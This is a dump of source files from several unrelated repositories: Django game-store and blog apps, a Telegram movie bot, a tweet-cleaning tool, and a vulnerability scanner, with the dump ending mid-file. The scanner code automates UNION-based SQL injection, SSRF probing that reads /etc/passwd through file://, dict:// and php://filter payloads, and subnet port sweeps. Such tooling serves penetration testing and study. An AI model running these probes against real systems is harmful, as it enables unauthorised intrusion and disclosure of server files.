index int64 | repo_name string | branch_name string | path string | content string | import_graph string |
|---|---|---|---|---|---|
50,609 | vamshivarsa/game_store_website_django | refs/heads/master | /games/viewsold.py | from django.shortcuts import render
from django.http import HttpResponse,Http404
from .models import Game
def index(request):
all_games=Game.objects.all()
return render(request,'games/gameindex.html',
{'all_games':all_games})
#old format withou out render(here we used HttpResponse)
#-------------------------------------------------------------
'''html=''
for game in all_games:
url ='/games/' + str(game.id) + '/'
html+= '<a href ="' + url + '">'+str(game.name) + '</a><br>'
return HttpResponse(html)'''
#---------------------------------------------------------
def details(request,game_id):
try:
game=Game.objects.get(id=game_id)
except Game.DoesNotExist:
raise Http404("THIS GAME IS NOT EXIST")
return render(request,'games/404error.html',{'game':game})
| {"/todolist/views.py": ["/todolist/models.py"], "/games/viewsold.py": ["/games/models.py"], "/games/views.py": ["/games/models.py"]} |
50,610 | vamshivarsa/game_store_website_django | refs/heads/master | /games/urls.py | from django.contrib import admin
from django.urls import path,re_path
from .import views
urlpatterns = [
path('', views.IndexView.as_view(), name='index'),
re_path(r'^(?P<pk>[0-9]+)/$', views.DetailView.as_view(), name='index'),
]
| {"/todolist/views.py": ["/todolist/models.py"], "/games/viewsold.py": ["/games/models.py"], "/games/views.py": ["/games/models.py"]} |
50,611 | vamshivarsa/game_store_website_django | refs/heads/master | /games/views.py | from django.views import generic
from .models import Game
class IndexView(generic.ListView):
template_name = 'games/gameindex.html'
def get_queryset(self):
return Game.objects.all()
class DetailView(generic.DetailView):
model = Game
template_name = 'games/404error.html' | {"/todolist/views.py": ["/todolist/models.py"], "/games/viewsold.py": ["/games/models.py"], "/games/views.py": ["/games/models.py"]} |
50,612 | vamshivarsa/game_store_website_django | refs/heads/master | /todolist/models.py | from django.db import models
# Create your models here.
class TodoItem(models.Model):
def __str__(self):
return self.field
field = models.TextField()
| {"/todolist/views.py": ["/todolist/models.py"], "/games/viewsold.py": ["/games/models.py"], "/games/views.py": ["/games/models.py"]} |
50,613 | vamshivarsa/game_store_website_django | refs/heads/master | /games/models.py | from django.db import models
class Game(models.Model):
def __str__(self):
return self.name + '-' + self.game_type + '-' + self.price
name = models.CharField(max_length=1000)
game_type=models.CharField(max_length=1000)
price = models.CharField(max_length=1000)
game_img = models.CharField(max_length=1000)
| {"/todolist/views.py": ["/todolist/models.py"], "/games/viewsold.py": ["/games/models.py"], "/games/views.py": ["/games/models.py"]} |
50,614 | vjkuznetsov/heroku-telegram-bot | refs/heads/master | /search_engine.py | import wikipedia
from cinema_bot_exception import CinemaBotException
from serpapi.google_search_results import GoogleSearchResults
WATCH_QUERY_FIXTURE = r"смотреть онлайн"
POSTER_QUERY_FIXTURE = r"постер"
INFO_PREFIX = r"фильм"
# cfg (depends on serp api format)
WATCH_RESULT = "organic_results"
WATCH_CATEGORY = "link"
POS = 0
POSTER_RESULT = "images_results"
POSTER_SIZE = "original"
def watch(message, cfg):
params = {"q": f"{message} {WATCH_QUERY_FIXTURE}"}
params.update(cfg)
try:
result = _search(params)
link = result[WATCH_RESULT][POS][WATCH_CATEGORY]
return link
except Exception as exc:
raise CinemaBotException(*exc.args)
def info(message, cfg):
find_query = f"{message} {INFO_PREFIX}"
try:
wikipedia.set_lang(cfg["language"])
info = wikipedia.summary(find_query)
return info
except Exception as exc:
raise CinemaBotException(*exc.args)
def poster(message, cfg):
params = {"q": message}
params.update(cfg)
params.update({"tbm": "isch"}) # image search
try:
result = _search(params)
link = result[POSTER_RESULT][POS][POSTER_SIZE]
return link
except Exception as exc:
raise CinemaBotException(*exc.args)
def _search(params):
client = GoogleSearchResults(params)
return client.get_dict()
| {"/bot.py": ["/search_engine.py"]} |
50,615 | vjkuznetsov/heroku-telegram-bot | refs/heads/master | /bot.py | import datetime
import os
import telebot
import urllib
import yaml
import search_engine
from io import BytesIO
from cinema_bot_exception import CinemaBotException
WELCOME_MESSAGE = r"""
Hello, i'm cinemabot by Vladimir Kuznetsov (v.j.kuznetsov@gmail.com)
Allowed coomands:
/find - looking for a link to watching a movie
/info - print summary about the movie
/poster - print poster
"""
API_KEY_EXCEEDED_MESSAGE = r"""
Error: api_key exceeded, please contact the administrator"""
ERROR_MESSAGE = r"""
An error occurred during the search, please contact the administrator."""
# load configuration
with open('cfg.yml', 'r') as ymlfile:
cfg = yaml.load(ymlfile, Loader=yaml.Loader)
# load tokens
telegram_token = os.getenv('TELEGRAM_TOKEN')
cfg_se = cfg['search_engine']
cfg_se['api_key'] = os.getenv('SE_TOKEN')
def _check_api_key_expired(cfg):
"""Return true if search engine api key expired
Arguments:
cfg -- dict with configuration from yaml
"""
expired_day = cfg["serpapi"]["expired_date"]
return expired_day < datetime.datetime.now().date()
def _exc_logger(message, exc):
"""Logged error
Arguments:
message -- received messages
exc -- exception object"""
print(f"{datetime.datetime.now()}: Exception raises:\
{exc.args} after income message: {message}")
bot = telebot.TeleBot(telegram_token)
@bot.message_handler(commands=['start', 'help'])
def send_welcome(message):
if _check_api_key_expired(cfg):
bot.reply_to(message, API_KEY_EXCEEDED_MESSAGE)
else:
bot.reply_to(message, WELCOME_MESSAGE)
@bot.message_handler(commands=['find'])
def search_watch(message):
message_text = message.text.lstrip('/find')
try:
result = search_engine.watch(message_text, cfg_se)
bot.send_message(message.chat.id, result)
except CinemaBotException as exc:
_exc_logger(message, exc)
bot.send_message(message.chat.id, ERROR_MESSAGE)
@bot.message_handler(commands=['info'])
def search_info_(message):
message_text = message.text.lstrip('/info')
try:
wiki_summary = search_engine.info(message_text, cfg_se)
bot.send_message(message.chat.id, wiki_summary)
except CinemaBotException as exc:
_exc_logger(message, exc)
bot.send_message(message.chat.id, ERROR_MESSAGE)
@bot.message_handler(commands=['poster'])
def search_poster_(message):
message_text = message.text.lstrip('/poster')
try:
result_link = search_engine.poster(message_text, cfg_se)
bot.send_photo(message.chat.id,
BytesIO(urllib.request.urlopen(result_link).read()))
except CinemaBotException as exc:
_exc_logger(message, exc)
bot.send_message(message.chat.id, ERROR_MESSAGE)
if __name__ == '__main__':
bot.polling()
| {"/bot.py": ["/search_engine.py"]} |
50,616 | mkilli83/twitter-classifier | refs/heads/master | /src/core.py | # -*- coding: utf-8 -*-
import datetime
import re
from pprint import pformat
import GetOldTweets3 as got
import pandas as pd
from src.utils import Timer, load_csv, paths
USE_TWEETS_COLS = ["username", "formatted_date", "cleaned_text", "text"]
PRE_PROCESSING_OPTIONS = {
# custom
"lower_string": True,
"remove_url": True,
"remove_at_string": True,
# gensim
"remove_stopwords": True,
"split_alphanum": False,
"stem_text": False,
"strip_non_alphanum": False,
"strip_punctuation": True,
"strip_tags": True,
"strip_numeric": True,
"strip_multiple_whitespaces": True,
}
def get_raw_tweets(query_dict):
"""
Get raw tweets
:param query_dict:
query_string: 'datacamp lang:en'
time_since: '2019-03-01'
time_until: '2019-05-01'
max_tweets: 0 for unlimited
:return: dataframe
"""
file_name = _convert_query_dict_to_str_as_filename(query_dict)
save_raw_file_name = paths.raw_tweets / f"raw_{file_name}.csv"
print(file_name)
if save_raw_file_name.is_file():
print(f"Raw file {repr(save_raw_file_name)} already exists, reload")
tweet_df = load_csv(save_raw_file_name)
else:
_validate_query(query_dict)
print(f"Getting raw tweets with query:\n{query_dict!r}")
tweet_criteria = _create_search_criteria(**query_dict)
tweet_objects = _get_tweet_object(tweet_criteria)
tweet_df = _convert_tweets_to_dataframe(tweet_objects)
print(f"Saving raw tweets to: {repr(save_raw_file_name)}")
tweet_df.to_csv(save_raw_file_name, index=False)
print("Done getting raw tweets.")
return tweet_df
def clean_tweets_text(tweet_df):
with Timer("clean tweets text"):
processing_func = create_preprocessing_functions(PRE_PROCESSING_OPTIONS)
tweet_df["cleaned_text"] = tweet_df["text"].apply(processing_func)
empty_str_after_cleaning = (tweet_df["cleaned_text"].isna()) | (
tweet_df["cleaned_text"] == ""
)
num_empty_str_after_cleaning = empty_str_after_cleaning.sum()
print(
f"There are {num_empty_str_after_cleaning:,} number of empty text after cleaning, dropping them"
)
tweet_df = tweet_df[~empty_str_after_cleaning].reset_index(drop=True)
return tweet_df
def create_preprocessing_functions(pre_processing_options):
"""
Creates a preprocessing function that iterates through user-defined preprocessing steps to clean a tweet
:param pre_processing_options:
# custom
'lower_string': True,
'remove_url': True,
'remove_at_string': True,
# gensim
'remove_stopwords': True,
'split_alphanum': False,
'stem_text': False,
'strip_non_alphanum': False,
'strip_punctuation': True,
'strip_tags': True,
'strip_numeric': True,
'strip_multiple_whitespaces': True,
:return: function
"""
import gensim.parsing.preprocessing as p
import preprocessor
pre_processing_options_str_formatted = pformat(pre_processing_options, indent=2)
print(
f"Preprocessing tweet text with following choices:\n{pre_processing_options_str_formatted}\n"
)
# remove URL and emoji and simple smiley
preprocessor.set_options(
preprocessor.OPT.URL, preprocessor.OPT.EMOJI, preprocessor.OPT.SMILEY
)
# Complete list of pre-processing functions
pre_processing_funcs = {
# custom
"lower_string": lambda s: s.lower(),
"remove_url": preprocessor.clean,
"remove_at_string": lambda s: re.sub(r"@\w+", "", s),
# gensim
"remove_stopwords": p.remove_stopwords,
"split_alphanum": p.split_alphanum,
"stem_text": p.stem_text,
"strip_non_alphanum": p.strip_non_alphanum,
"strip_numeric": p.strip_numeric,
"strip_punctuation": p.strip_punctuation,
"strip_tags": p.strip_tags,
"strip_multiple_whitespaces": p.strip_multiple_whitespaces,
}
# Select preprocessing functions defined in PRE_PROCESSING_OPTIONS
use_preprocessing_funcs = []
for k, v in pre_processing_options.items():
if v:
use_preprocessing_funcs.append(pre_processing_funcs[k])
# Additional preprocessing function to remove quotations
patch = lambda s: re.sub(r"(“|”|’)", "", s)
use_preprocessing_funcs.append(patch)
# Defines function that iterates through preprocessing items and applies them on tweet
def _preprocessing_func(s):
s_processed = s
for f in use_preprocessing_funcs:
s_processed = f(s_processed)
return s_processed
return _preprocessing_func
def _convert_query_dict_to_str_as_filename(query_dict):
query_str_formatted = "_".join([str(v) for v in query_dict.values()]).replace(
" ", "_"
)
return query_str_formatted
def _validate_query(query_dict):
required_keys = ("query_string", "time_since", "time_until", "max_tweets")
if all(k in query_dict for k in required_keys):
print("(All required query arguments are provided)")
else:
raise ValueError(f"{query_dict} does not have all required keys")
def _create_search_criteria(query_string, time_since, time_until, max_tweets):
"""
Creates a tweet query using the twitter API
:params
query_string: 'datacamp lang:en'
since: '2019-03-01'
until: '2019-05-01'
max_tweets: 0 for unlimited
:returns tweetCriteria
"""
tweetcriteria = (
got.manager.TweetCriteria()
.setQuerySearch(f"{query_string} lang:en")
.setSince(time_since)
.setUntil(time_until)
.setMaxTweets(max_tweets)
)
return tweetcriteria
def _get_tweet_object(tweet_criteria):
with Timer("Get tweets"):
current_time = datetime.datetime.now().replace(microsecond=0)
print(f"Start tweet query at: {current_time}")
tweets = got.manager.TweetManager.getTweets(tweet_criteria)
print(f"Done query, {len(tweets):,} tweets returned")
return tweets
def _convert_tweets_to_dataframe(tweets):
"""
:param:
tweets: list of tweet object
:returns dataframe
"""
data = [vars(t) for t in tweets]
df = pd.DataFrame.from_records(data)
return df
def validation_of_ci():
return None
# print(tabulate(t, headers="keys"))
| {"/src/core.py": ["/src/utils.py"]} |
50,617 | mkilli83/twitter-classifier | refs/heads/master | /src/utils.py | import logging
import os
import pickle
from datetime import datetime as dt
from time import time
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from sklearn.metrics import confusion_matrix
from sklearn.utils.multiclass import unique_labels
plt.style.use("ggplot")
def load_csv(file_name, list_type_colname=None, **kwargs):
df = pd.read_csv(file_name, **kwargs)
if list_type_colname is not None:
from ast import literal_eval
df[list_type_colname] = df[list_type_colname].apply(literal_eval)
return df
# __enter(exit)__ allow you to use the when function
class Timer(object):
def __init__(self, description):
self.description = description
def __enter__(self):
self.start = time()
def __exit__(self, type, value, traceback):
self.end = time()
print(f"{self.description}, time took: {(self.end - self.start) / 60:.2f} mins")
def get_paths(create_dir=True):
from pathlib import Path
from types import SimpleNamespace # SimpleNamespace is just quick class
cwd = Path(os.getcwd())
print(f"Current working directory: {repr(cwd)}")
file_paths = [
"cleaned_tweets",
"raw_tweets",
] # file_paths = ['cleaned_tweets', 'raw_tweets', 'pics', 'models']
# Creates dictionary of paths
file_paths = {fp: cwd / fp for fp in file_paths}
if create_dir:
for fp in file_paths.values():
os.makedirs(str(fp), exist_ok=True)
file_paths = SimpleNamespace(**file_paths)
return file_paths
paths = get_paths()
| {"/src/core.py": ["/src/utils.py"]} |
50,639 | dokhiem/pythonweb-site | refs/heads/master | /blog/models.py | from django.db import models
from django.conf import settings
# Create your models here.
class Post(models.Model):
title=models.CharField(max_length=100)
body=models.TextField()
date=models.DateTimeField(auto_now_add=True)
image=models.ImageField(null=True)
def __str__(self):
return self.title
class Comment(models.Model):
post=models.ForeignKey(Post,on_delete=models.CASCADE,related_name='comments')
author=models.ForeignKey(settings.AUTH_USER_MODEL,on_delete=models.CASCADE)
body=models.TextField()
date=models.DateTimeField(auto_now_add=True) | {"/blog/views.py": ["/blog/models.py"]} |
50,640 | dokhiem/pythonweb-site | refs/heads/master | /blog/views.py | #from blog.forms import CommentForm
from msilib.schema import ListView
from tempfile import template
from django.shortcuts import get_object_or_404, render
from .models import Post, Comment
from .forms import CommentForm
from django.http import Http404,HttpResponseRedirect
from django.views.generic import ListView,DetailView
# Create your views here.
def post(request,pk):
post=get_object_or_404(Post,pk=pk)
form= CommentForm()
if request.method=='POST':
form=CommentForm(request.POST,author=request.user,post=post)
if form.is_valid():
form.save()
return HttpResponseRedirect(request.path)
return render(request,"blog/post.html",{"post":post,"form":form})
'''def list(request):
Data = {'Posts': Post.objects.all().order_by('-date')}
return render(request, 'blog/blog.html', Data)
def post(request,id):
try:
post= Post.objects.get(id=id)
except Post.DoesNotExist:
raise Http404("Bài viết không tồn tại")
return render(request,'blog/post.html',{'post':post})'''
class PostListView(ListView):
queryset=Post.objects.all().order_by('-date')
template_name='blog/blog.html'
context_object_name='Posts'
paginate_by=1
class PostDetailView(DetailView):
model=Post
template_name='blog/post.html'
| {"/blog/views.py": ["/blog/models.py"]} |
50,646 | PanDa1G1/sunsecScanner | refs/heads/master | /sql_injection/union.py | # -*- coding: UTF-8 -*-
from difflib import SequenceMatcher
import requests
import sys
from urllib import parse
import re
import aiohttp
from colorama import Fore, Style, Back
class ScanUnion():
def __init__(self,url,method = "GET",file = "sql_injection/payload/header.txt"):
self.url = url
self.field_count = 0
self.ifInjection = False
self.headers = {
'User-agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8',
'Accept-Language': 'Zh-CN, zh;q=0.8, en-gb;q=0.8, en-us;q=0.8',
'Accept-Encoding': 'identity',
'Keep-Alive': '300',
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
}
self.method = method
self.pre_dict = []
self.filed_num = 50
self.stuffix = ["#","-- "]
self.size = 10
self.cookie = {"PHPSESSID":"l4d5vimt214shhrop6etsr22k4","security":"low"}
self.data = {}
self.postHeaders = {}
self.header_file = file
def get_ratio(self,payload,res_text):
seqm = SequenceMatcher()
text = self.get_page(payload)
seqm.set_seq1(text)
seqm.set_seq2(res_text)
return seqm.ratio()
def get_page(self,payload):
if self.method == "GET":
payload = parse.quote(payload.encode("utf-8"))
url = self.url.replace("*",payload)
text = requests.get(url,headers = self.headers,cookies = self.cookie).content
return text.decode("utf-8")
else:
self.prepare_post(payload)
text = requests.post(self.url,headers = self.postHeaders,data = self.data).content
return text.decode("utf-8")
def make_payload(self,payload):
if self.method == "GET":
for stuffix in self.stuffix:
for pre in self.pre_dict:
and_position = pre.index("an")
result = str(pre[:and_position]) + payload + stuffix + pre[and_position:]
yield result,pre
else:
for stuffix in self.stuffix:
for pre_ in self.pre_dict:
result = pre_ + payload + stuffix
yield result,pre_
def prepare_post(self,payload):
with open(self.header_file,"r") as f:
for i in f:
if not self.postHeaders:
if ":" in i.strip("\n"):
temp = i.strip("\n").split(":")
self.postHeaders[temp[0]] = temp[1].strip(" ")
if "&" in i.strip("\n"):
temp = i.strip("\n").split("&")
for data_ in temp:
data1 = data_.split("=")
if "*" in data1:
self.data[data1[0]] = payload
else:
self.data[data1[0]] = data1[1].strip(" ")
else:
if ":" in i.strip("\n"):
temp = i.strip("\n").split(":")
self.postHeaders[temp[0]] = temp[1].strip(" ")
if "&" in i.strip("\n"):
temp = i.strip("\n").split("&")
for data_ in temp:
data1 = data_.split("=")
if "*" in data1:
self.data[data1[0]] = payload
else:
self.data[data1[0]] = data1[1].strip(" ")
def check_if_can_inject(self):
sys.stdout.write(Fore.LIGHTGREEN_EX + "[~]checking whether can be injected......\n")
with open("sql_injection/payload/payload1.txt","r") as f:
for i in f:
false_payload = i.strip("\n")
true_payload = false_payload.replace('8','6')
false_page = self.get_page(false_payload)
if "You have an error in your SQL syntax" in false_page:
continue
ratio = self.get_ratio(true_payload,false_page)
#print(ratio,true_payload,sep = " => ")
if ratio <0.994:
self.pre_dict.append(true_payload.replace("1","0"))
#print(self.pre_dict)
if self.pre_dict:
sys.stdout.write(Fore.LIGHTGREEN_EX + "[*]it can be injected\n")
return True
else:
sys.stdout.write(Fore.LIGHTRED_EX + "[-]it can't be injected\n")
return False
def padding(self,str_):
return str_ + "*" * (self.size-len(str_))
def get_field_num(self):
with open("sql_injection/payload/order.txt","r") as f:
for order in f:
start = 0
filed_num = 50
temp_num = 0
count = 100 # 避免无限循环
flag = 1000
while True:
payload_ = order.strip("\n") + " " + "{}".format(filed_num)
for payload,pre in self.make_payload(payload_):
#print(payload)
page = self.get_page(payload)
if "Unknown column '{}' in 'order clause'".format(filed_num) in page:
self.pre_dict.clear()
self.pre_dict.append(pre)
flag -= 1
temp_num = filed_num
filed_num = int((start + filed_num) / 2)
break
elif "You have an error in your SQL syntax" in page:
count -= 1
continue
elif flag == 1000:
continue
else:
start = filed_num
filed_num = int((start + temp_num) / 2)
count -= 1
if start != temp_num - 1:
break
else:
sys.stdout.write(Fore.LIGHTGREEN_EX + "[*]order sentence is {}\n".format(order.strip("\n")))
return filed_num
if count == 0:
break
return False
def union_inject(self):
if self.method == "GET":
if not self.check_if_can_inject():
sys.exit(0)
else:
self.pre_dict = ["' ",'" ',"') "," ","')) ",")' ","))' ",'") ','")) ',')" ','))" ']
result = ""
union_payload = []
filed_num = self.get_field_num()
if filed_num:
sys.stdout.write(Fore.LIGHTGREEN_EX + "[*]The column number is {}\n".format(filed_num))
sys.stdout.write(Fore.LIGHTGREEN_EX + "[~]strat getting inject position......\n")
for i in range(1,filed_num+1):
result += "'{}'".format("000" + self.padding(str(i)) + "000")+ ","
union_payload.append(result[:-1])
result = ""
for i in range(1,filed_num+1):
result += "(SelEct('{}'))".format("000" + self.padding(str(i)) + "000")+ 'a'*i + " join "
union_payload.append(result[:-5])
for pyload in union_payload:
with open("sql_injection/payload/union.txt","r") as f:
for union in f:
payload_ = union.strip("\n") + pyload
for payload,pre in self.make_payload(payload_):
position_set = set()
page = self.get_page(payload)
if "You have an error in your SQL syntax" in page:
continue
str2 = re.findall("000([0-9*]{10})000",page)
if str2:
sys.stdout.write(Fore.LIGHTGREEN_EX + "[*]available payload: {}\n".format(payload))
for position in str2:
if not position in position_set:
position_set.add(position)
if position_set:
while position_set:
sys.stdout.write(Fore.LIGHTGREEN_EX + "[*]position {} can be injected\n".format(position_set.pop().split("*")[0]))
sys.exit(0)
else:
continue
else:
sys.stdout.write(Fore.LIGHTRED_EX + "[-]can't get field num\n")
sys.exit(0)
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,647 | PanDa1G1/sunsecScanner | refs/heads/master | /ssrf/ssrf.py | import requests
import re
import sys
import asyncio
from aiohttp import ClientSession
from difflib import SequenceMatcher
from urllib.parse import quote
from colorama import Fore, Style, Back
class ssrfScan():
def __init__(self,url,remoteFile=None,num=100):
self.url = url
self.headers = {
'User-agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8',
'Accept-Language': 'Zh-CN, zh;q=0.8, en-gb;q=0.8, en-us;q=0.8',
'Accept-Encoding': 'identity',
'Keep-Alive': '300',
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
}
self.queue = asyncio.Queue()
self.tasks=[]
self.loop = asyncio.get_event_loop()
self.remoteFile = remoteFile
self.num = num
#dict 协议
def dictScan(self):
payload = "dict://127.0.0.1:80/sunsec_test"
url = self.url.replace("*",payload)
content = requests.get(url,headers = self.headers).text
#print(content)
if re.search("HTTP\/(.|\n)*Server:(.|\n)*",content):
sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]dict protocol is available!\n")
#file协议
def FileScan(self):
payload = "file:///etc/passwd"
url = self.url.replace("*",payload)
content = requests.get(url,headers = self.headers).text
#print(content)
if "root:x:0:0:root:/root:/bin/bash" in content:
sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]file protocol is available!\n")
#php伪协议
def phpScan(self):
file = self.url.split("/")[-1].split("?")[0]
payload = "php://filter/read=convert.base64-encode/resource={}".format(file)
url = self.url.replace("*",payload)
content = requests.get(url,headers = self.headers).text
#print(content)
if re.search("[a-z0-9A-Z=+/]{60}",content):
sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]php protocol is available!\n")
def url_in_queue(self):
file = "ssrf/url.txt"
with open(file,"rb") as f:
for item in f:
self.queue.put_nowait(item.decode("utf-8").strip("\r\n"))
async def get_response(self,url,session):
url = self.url.replace("*",url)
#print(url)
s = await session.get(url,headers = self.headers)
return await s.text()
def get_ratio(self,res_text):
seqm = SequenceMatcher()
url = self.url.split("?")[0]
text = requests.get(url,headers = self.headers).text
#print(text,res_text,sep="\n========================\n")
seqm.set_seq1(text)
seqm.set_seq2(res_text)
return seqm.ratio()
async def httpScan(self):
session = ClientSession()
while True:
if not self.queue.empty():
url = await self.queue.get()
#print(url)
try:
text = await self.get_response(url,session)
ratio = self.get_ratio(text)
#print(ratio)
if ratio < 0.3 and "400 Bad Request" not in text:
sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]ip {} is available!\n".format(url))
except:
pass
else:
#print(param)
await session.close()
break
def start(self):
self.tasks = [self.httpScan() for i in range(self.num)]
self.loop.run_until_complete(asyncio.wait(self.tasks))
def redirectScan(self):
url = self.url.replace("*",self.remoteFile)
#print(url)
content = requests.get(url,headers = self.headers).text
ratio = self.get_ratio(content)
#print(content)
if ratio < 0.3:
sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]302 redirect is available!\n")
if __name__ == "__main__":
a = ssrfScan("http://192.168.8.181/ssrf/1.php?url=*",remoteFile = "http://39.105.115.217:8888/302.php")
a.url_in_queue()
#a.FileScan()
#a.dictScan()
a.start()
#a.redirectScan() | {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,648 | PanDa1G1/sunsecScanner | refs/heads/master | /sunTest/sunTest/pipelines.py | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
class SuntestPipeline(object):
def process_item(self, item, spider):
result = dict(item)
#print("[6]",result,sep="")
with open('D:\\code\\python\\scan\\myscan\\database\\url.txt', 'a', encoding='utf-8') as file:
url = result.get("scanUrl")
#print("[7]",url,sep="")
file.write(url+"\n")
return item
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,649 | PanDa1G1/sunsecScanner | refs/heads/master | /src/Ipscan.py | import queue
import socket
import threading
import time
from src._print import _print
class Ipscan():
def __init__(self,url,thread_num = 100):
self.host = url
self.thread_num = thread_num
self.queue = queue.Queue()
self.queue2 = queue.Queue()
self._print = _print()
self.port_list = [22,80,111,443,8080]
self.threads = [threading.Thread(target = self.scan) for i in range(thread_num)]
def ip_queue(self):
num = self.host.split('/')[1]
ip_list = self.host.split('/')[0].split('.')
if int(num) == 24:
ip = ip_list[0] + '.' + ip_list[1] + '.' + ip_list[2]
for i in range(256):
real_ip = ip + '.' + str(i)
self.queue.put(real_ip)
self.length = self.queue.qsize()
elif int(num) == 16:
ip = ip_list[0] + '.' + ip_list[1]
for i in range(256):
for j in range(256):
real_ip = ip + '.' + str(i) + '.' + str(j)
self.queue.put(real_ip)
self.length = self.queue.qsize()
else:
ip = ip_list[0]
for i in range(256):
for j in range(256):
for k in range(256):
real_ip = ip + '.' + str(i) + '.' + str(j) + '.' + str(k)
self.queue.put(real_ip)
self.length = self.queue.qsize()
def out_queue(self,queue):
return queue.get()
def scan(self):
while not self.queue.empty():
ip = self.out_queue(self.queue)
for port in self.port_list:
#print(ip,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(0.1)
res = s.connect_ex((ip, port))
s.close()
if res ==0:
self._print.ip_res(ip)
#print(ip,port)
break
def scan_start(self):
self._print.print_info("Start Ipscan : %s" % time.strftime("%H:%M:%S"))
time0 = time.time()
for i in self.threads:
i.start()
for i in self.threads:
i.join()
time2 = time.time() - time0
self._print.port_end(time2)
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,650 | PanDa1G1/sunsecScanner | refs/heads/master | /sunTest/sunTest/middlewares.py | # -*- coding: utf-8 -*-
# Define here the models for your spider middleware
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
from selenium.common.exceptions import NoAlertPresentException
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.action_chains import ActionChains
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.common.alert import Alert
from scrapy.http import HtmlResponse
import random
from selenium.common import exceptions
import sys
from colorama import Fore, Style, Back
class SuntestSpiderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the spider middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_spider_input(self, response, spider):
# Called for each response that goes through the spider
# middleware and into the spider.
# Should return None or raise an exception.
return None
def process_spider_output(self, response, result, spider):
# Called with the results returned from the Spider, after
# it has processed the response.
# Must return an iterable of Request, dict or Item objects.
for i in result:
yield i
def process_spider_exception(self, response, exception, spider):
# Called when a spider or process_spider_input() method
# (from other spider middleware) raises an exception.
# Should return either None or an iterable of Response, dict
# or Item objects.
pass
def process_start_requests(self, start_requests, spider):
# Called with the start requests of the spider, and works
# similarly to the process_spider_output() method, except
# that it doesn’t have a response associated.
# Must return only requests (not items).
for r in start_requests:
yield r
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
class SuntestDownloaderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the downloader middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_request(self, request, spider):
# Called for each request that goes through the downloader
# middleware.
# Must either:
# - return None: continue processing this request
# - or return a Response object
# - or return a Request object
# - or raise IgnoreRequest: process_exception() methods of
# installed downloader middleware will be called
return None
def process_response(self, request, response, spider):
# Called with the response returned from the downloader.
# Must either;
# - return a Response object
# - return a Request object
# - or raise IgnoreRequest
return response
def process_exception(self, request, exception, spider):
# Called when a download handler or a process_request()
# (from other downloader middleware) raises an exception.
# Must either:
# - return None: continue processing this exception
# - return a Response object: stops process_exception() chain
# - return a Request object: stops process_exception() chain
pass
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
class SeleniumMiddleWare:
def __init__(self):
self.firefox_options=Options()
self.firefox_options.headless = True
self.browser = webdriver.Firefox(options=self.firefox_options)
self.user_agents = [
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60Opera/8.0 (Windows NT 5.1; U; en)',
'Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.50',
